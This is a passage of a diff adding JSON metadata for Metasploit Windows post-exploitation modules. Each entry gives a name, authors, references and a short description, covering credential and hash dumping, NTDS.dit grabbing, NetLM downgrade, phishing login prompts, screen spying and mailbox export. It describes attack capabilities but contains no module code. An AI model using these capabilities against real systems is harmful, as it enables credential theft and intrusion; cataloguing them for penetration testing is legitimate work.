", + "Tebo " + ], + "description": "This module will enumerate the SNMP service configuration.", + "references": [ + "MSB-MS00-096", + "URL-https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-096" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-13 17:45:10 +0000", + "path": "/modules/post/windows/gather/enum_snmp.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_snmp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "powershell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_termserv": { + "name": "Windows Gather Terminal Server Client Connection Information Dumper", + "fullname": "post/windows/gather/enum_termserv", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "mubix " + ], + "description": "This module dumps MRU and connection data for RDP sessions.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_termserv.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_termserv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_tokens": { + "name": "Windows Gather Enumerate Domain Admin Tokens (Token Hunter)", + "fullname": "post/windows/gather/enum_tokens", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Abraham " + ], + "description": "This module enumerates Domain Admin account processes and delegation tokens.\n\n This module will first check if the session has sufficient privileges\n to replace process level tokens and adjust process quotas.\n\n The SeAssignPrimaryTokenPrivilege privilege will not be assigned if\n the session has been elevated to SYSTEM. In that case try first\n migrating to another process that is running as SYSTEM.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_tokens.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_tokens", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_tomcat": { + "name": "Windows Gather Apache Tomcat Enumeration", + "fullname": "post/windows/gather/enum_tomcat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Barry Shteiman " + ], + "description": "This module will collect information from a Windows-based Apache Tomcat. You will get\n information such as: The installation path, Tomcat version, port, web applications,\n users, passwords, roles, etc.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_tomcat.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_tomcat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_trusted_locations": { + "name": "Windows Gather Microsoft Office Trusted Locations", + "fullname": "post/windows/gather/enum_trusted_locations", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "vysec " + ], + "description": "This module will enumerate the Microsoft Office trusted locations on the target host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_trusted_locations.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_trusted_locations", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_unattend": { + "name": "Windows Gather Unattended Answer File Enumeration", + "fullname": "post/windows/gather/enum_unattend", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sean Verity ", + "sinn3r ", + "Ben Campbell ", + "GhostlyBox" + ], + "description": "This module will check the file system for a copy of unattend.xml and/or\n autounattend.xml found in Windows Vista, or newer Windows systems. And then\n extract sensitive information such as usernames and decoded passwords. Also\n checks for '.vmimport' files that could have been created by the AWS EC2 VMIE service.", + "references": [ + "URL-http://technet.microsoft.com/en-us/library/ff715801", + "URL-http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx", + "URL-http://technet.microsoft.com/en-us/library/c026170e-40ef-4191-98dd-0b9835bfa580", + "URL-https://aws.amazon.com/security/security-bulletins/AWS-2024-006/", + "URL-https://www.immersivelabs.com/blog/the-return-of-unattend-xml-revenge-of-the-cleartext-credentials/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_unattend.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_unattend", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/exchange": { + "name": "Windows Gather Exchange Server Mailboxes", + "fullname": "post/windows/gather/exchange", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "SophosLabs Offensive Security team" + ], + "description": "This module will gather information from an on-premise Exchange Server running on the target machine.\n\n Two actions are supported:\n LIST (default action): List basic information about all Exchange servers and mailboxes hosted on the target.\n EXPORT: Export and download a chosen mailbox in the form of a .PST file, with support for an optional filter keyword.\n\n For a list of valid filters, see https://docs.microsoft.com/en-us/exchange/filterable-properties-for-the-contentfilter-parameter\n\n The executing user has to be assigned to the \"Organization Management\" role group for the module to successfully run.\n\n Tested on Exchange Server 2010 on Windows Server 2012 R2 and Exchange Server 2016 on Windows Server 2016.", + "references": [ + "URL-https://github.com/sophoslabs/metasploit_gather_exchange", + "URL-https://news.sophos.com/en-us/2021/03/09/sophoslabs-offensive-security-releases-post-exploitation-tool-for-exchange/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/exchange.rb", + "is_install_path": true, + "ref_name": "windows/gather/exchange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "EXPORT", + "description": "Export and download a chosen mailbox in the form of a .PST file, with support for an optional filter keyword" + }, + { + "name": "LIST", + "description": "List basic information about all Exchange servers and mailboxes hosted on the target" + } + ] + }, + "post_windows/gather/file_from_raw_ntfs": { + "name": "Windows File Gather File from Raw NTFS", + "fullname": "post/windows/gather/file_from_raw_ntfs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Danil Bazin " + ], + "description": "This module gathers a file using the raw NTFS device, bypassing some Windows restrictions\n such as open file with write lock. Because it avoids the usual file locking issues, it can\n be used to retrieve files such as NTDS.dit.", + "references": [ + "URL-http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-03 12:57:40 +0000", + "path": "/modules/post/windows/gather/file_from_raw_ntfs.rb", + "is_install_path": true, + "ref_name": "windows/gather/file_from_raw_ntfs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/browser_history": { + "name": "Windows Gather Skype, Firefox, and Chrome Artifacts", + "fullname": "post/windows/gather/forensics/browser_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua Harper " + ], + "description": "Gathers Skype chat logs, Firefox history, and Chrome history data from the target machine.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/browser_history.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/browser_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/duqu_check": { + "name": "Windows Gather Forensics Duqu Registry Check", + "fullname": "post/windows/gather/forensics/duqu_check", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Marcus J. Carey " + ], + "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.", + "references": [ + "CVE-2011-3402", + "URL-http://r-7.co/w5h7fY" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/duqu_check.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/duqu_check", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/enum_drives": { + "name": "Windows Gather Physical Drives and Logical Volumes", + "fullname": "post/windows/gather/forensics/enum_drives", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "This module will list physical drives and logical volumes", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/enum_drives.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/enum_drives", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/fanny_bmp_check": { + "name": "FannyBMP or DementiaWheel Detection Registry Check", + "fullname": "post/windows/gather/forensics/fanny_bmp_check", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "William M." + ], + "description": "This module searches for the Fanny.bmp worm related reg keys.\n fannybmp is a worm that exploited zero day vulns\n (more specifically, the LNK Exploit CVE-2010-2568).\n Which allowed it to spread even if USB Autorun was turned off.\n This is the same exploit that was used in StuxNet.", + "references": [ + "URL-https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787", + "CVE-2010-2568" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/forensics/fanny_bmp_check.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/fanny_bmp_check", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/imager": { + "name": "Windows Gather Forensic Imaging", + "fullname": "post/windows/gather/forensics/imager", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "This module will perform byte-for-byte imaging of remote disks and volumes.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/imager.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/imager", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/nbd_server": { + "name": "Windows Gather Local NBD Server", + "fullname": "post/windows/gather/forensics/nbd_server", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley McGrew " + ], + "description": "Maps remote disks and logical volumes to a local Network Block Device server.\n Allows for forensic tools to be executed on the remote disk directly.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/forensics/nbd_server.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/nbd_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/forensics/recovery_files": { + "name": "Windows Gather Deleted Files Enumeration and Recovering", + "fullname": "post/windows/gather/forensics/recovery_files", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module lists and attempts to recover deleted files from NTFS file systems. Use\n the FILES option to guide recovery. Leave this option empty to enumerate deleted files in the\n DRIVE. Set FILES to an extension (e.g., \"pdf\") to recover deleted files with that\n extension, or set FILES to a comma separated list of IDs (from enumeration) to\n recover those files. The user must have account file enumeration. Recovery\n may take a long time; use the TIMEOUT option to abort enumeration or recovery by\n extension after a specified period (in seconds).", + "references": [ + "URL-https://www.youtube.com/watch?v=9yzCf360ujY&hd=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/forensics/recovery_files.rb", + "is_install_path": true, + "ref_name": "windows/gather/forensics/recovery_files", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/get_bookmarks": { + "name": "Bookmarked Sites Retriever", + "fullname": "post/windows/gather/get_bookmarks", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "jerrelgordon" + ], + "description": "This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-11 14:29:36 +0000", + "path": "/modules/post/windows/gather/get_bookmarks.rb", + "is_install_path": true, + "ref_name": "windows/gather/get_bookmarks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/hashdump": { + "name": "Windows Gather Local User Account Password Hashes (Registry)", + "fullname": "post/windows/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module will dump the local user accounts from the SAM database using the registry", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "windows/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/local_admin_search_enum": { + "name": "Windows Gather Local Admin Search", + "fullname": "post/windows/gather/local_admin_search_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon McCann \"zeknox\" ", + "Thomas McCarthy \"smilingraccoon\" ", + "Royce Davis \"r3dy\" " + ], + "description": "This module will identify systems in a given range that the\n supplied domain user (should migrate into a user pid) has administrative\n access to by using the Windows API OpenSCManagerA to establishing a handle\n to the remote host. Additionally it can enumerate logged in users and group\n membership via Windows API NetWkstaUserEnum and NetUserGetGroups.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/local_admin_search_enum.rb", + "is_install_path": true, + "ref_name": "windows/gather/local_admin_search_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/lsa_secrets": { + "name": "Windows Enumerate LSA Secrets", + "fullname": "post/windows/gather/lsa_secrets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Rob Bathurst " + ], + "description": "This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:\n HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt\n code from cachedump.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/lsa_secrets.rb", + "is_install_path": true, + "ref_name": "windows/gather/lsa_secrets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/make_csv_orgchart": { + "name": "Generate CSV Organizational Chart Data Using Manager Information", + "fullname": "post/windows/gather/make_csv_orgchart", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will generate a CSV file containing all users and their managers, which can be\n imported into Visio which will render it.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/make_csv_orgchart.rb", + "is_install_path": true, + "ref_name": "windows/gather/make_csv_orgchart", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/memory_dump": { + "name": "Windows Process Memory Dump", + "fullname": "post/windows/gather/memory_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "smashery" + ], + "description": "This module creates a memory dump of a process (to disk) and downloads the file\n for offline analysis.\n\n Options for DUMP_TYPE affect the completeness of the dump:\n\n \"full\" retrieves the entire process address space (all allocated pages);\n \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n well as memory mapped files. As a result, this option can be significantly\n smaller in size.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/memory_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/memory_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/memory_grep": { + "name": "Windows Gather Process Memory Grep", + "fullname": "post/windows/gather/memory_grep", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit " + ], + "description": "This module allows for searching the memory space of a process for potentially\n sensitive data. Please note: When the HEAP option is enabled, the module will have\n to migrate to the process you are grepping, and will not migrate back automatically.\n This means that if the user terminates the application after using this module, you\n may lose your session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/memory_grep.rb", + "is_install_path": true, + "ref_name": "windows/gather/memory_grep", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/netlm_downgrade": { + "name": "Windows NetLM Downgrade Attack", + "fullname": "post/windows/gather/netlm_downgrade", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Brandon McCann \"zeknox\" ", + "Thomas McCarthy \"smilingraccoon\" " + ], + "description": "This module changes the system LmCompatibilityLevel registry value\n to enable sending LM challenge hashes and initiates a SMB connection\n to the host specified in the SMBHOST module option. If an SMB server\n is listening, it will receive the NetLM hashes for the session user.", + "references": [ + "URL-https://web.archive.org/web/20210311141729/https://www.optiv.com/explore-optiv-insights/blog/post-exploitation-using-netntlm-downgrade-attacks", + "URL-https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level", + "URL-https://support.microsoft.com/en-us/topic/security-guidance-for-ntlmv1-and-lm-network-authentication-da2168b6-4a31-0088-fb03-f081acde6e73" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-10-01 22:35:11 +0000", + "path": "/modules/post/windows/gather/netlm_downgrade.rb", + "is_install_path": true, + "ref_name": "windows/gather/netlm_downgrade", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/ntds_grabber": { + "name": "NTDS Grabber", + "fullname": "post/windows/gather/ntds_grabber", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe (koen.riepe " + ], + "description": "This module uses a powershell script to obtain a copy of the ntds,dit SAM and SYSTEM files on a domain controller.\n It compresses all these files in a cabinet file called All.cab.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/ntds_grabber.rb", + "is_install_path": true, + "ref_name": "windows/gather/ntds_grabber", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/ntds_location": { + "name": "Post Windows Gather NTDS.DIT Location", + "fullname": "post/windows/gather/ntds_location", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will find the location of the NTDS.DIT file (from the Registry),\n check that it exists, and display its location on the screen, which is useful\n if you wish to manually acquire the file using ntdsutil or vss.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/ntds_location.rb", + "is_install_path": true, + "ref_name": "windows/gather/ntds_location", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/outlook": { + "name": "Windows Gather Outlook Email Messages", + "fullname": "post/windows/gather/outlook", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley Neelen " + ], + "description": "This module allows reading and searching email messages from the local\n Outlook installation using PowerShell. Please note that this module is\n manipulating the victims keyboard/mouse. If a victim is active on the target\n system, he may notice the activities of this module. Tested on Windows 8.1\n x64 with Office 2013.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/outlook.rb", + "is_install_path": true, + "ref_name": "windows/gather/outlook", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "LIST", + "description": "Lists all folders" + }, + { + "name": "SEARCH", + "description": "Searches for an email" + } + ] + }, + "post_windows/gather/phish_windows_credentials": { + "name": "Windows Gather User Credentials (phishing)", + "fullname": "post/windows/gather/phish_windows_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Wesley Neelen ", + "Matt Nelson" + ], + "description": "This module is able to perform a phishing attack on the target by popping up a loginprompt.\n When the user fills credentials in the loginprompt, the credentials will be sent to the attacker.\n The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/phish_windows_credentials.rb", + "is_install_path": true, + "ref_name": "windows/gather/phish_windows_credentials", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/psreadline_history": { + "name": "Windows Gather PSReadline History", + "fullname": "post/windows/gather/psreadline_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Garvit Dewan " + ], + "description": "Gathers Power Shell history data from the target machine.", + "references": [ + "URL-https://docs.microsoft.com/en-us/powershell/module/psreadline/", + "URL-https://github.com/KalibRx/PoshHarvestPy/blob/master/poshharvest.py", + "URL-https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/psreadline_history.rb", + "is_install_path": true, + "ref_name": "windows/gather/psreadline_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/resolve_sid": { + "name": "Windows Gather Local User Account SID Lookup", + "fullname": "post/windows/gather/resolve_sid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "chao-mu" + ], + "description": "This module prints information about a given SID from the perspective\n of this session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/resolve_sid.rb", + "is_install_path": true, + "ref_name": "windows/gather/resolve_sid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/screen_spy": { + "name": "Windows Gather Screen Spy", + "fullname": "post/windows/gather/screen_spy", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Roni Bachar ", + "bannedit ", + "kernelsmith ", + "Adrian Kubok", + "DLL_Cool_J" + ], + "description": "This module will incrementally take desktop screenshots from the host. This\n allows for screen spying which can be useful to determine if there is an active\n user on a machine, or to record the screen for later data extraction.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/screen_spy.rb", + "is_install_path": true, + "ref_name": "windows/gather/screen_spy", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/smart_hashdump": { + "name": "Windows Gather Local and Domain Controller Account Password Hashes", + "fullname": "post/windows/gather/smart_hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This will dump local accounts from the SAM Database. If 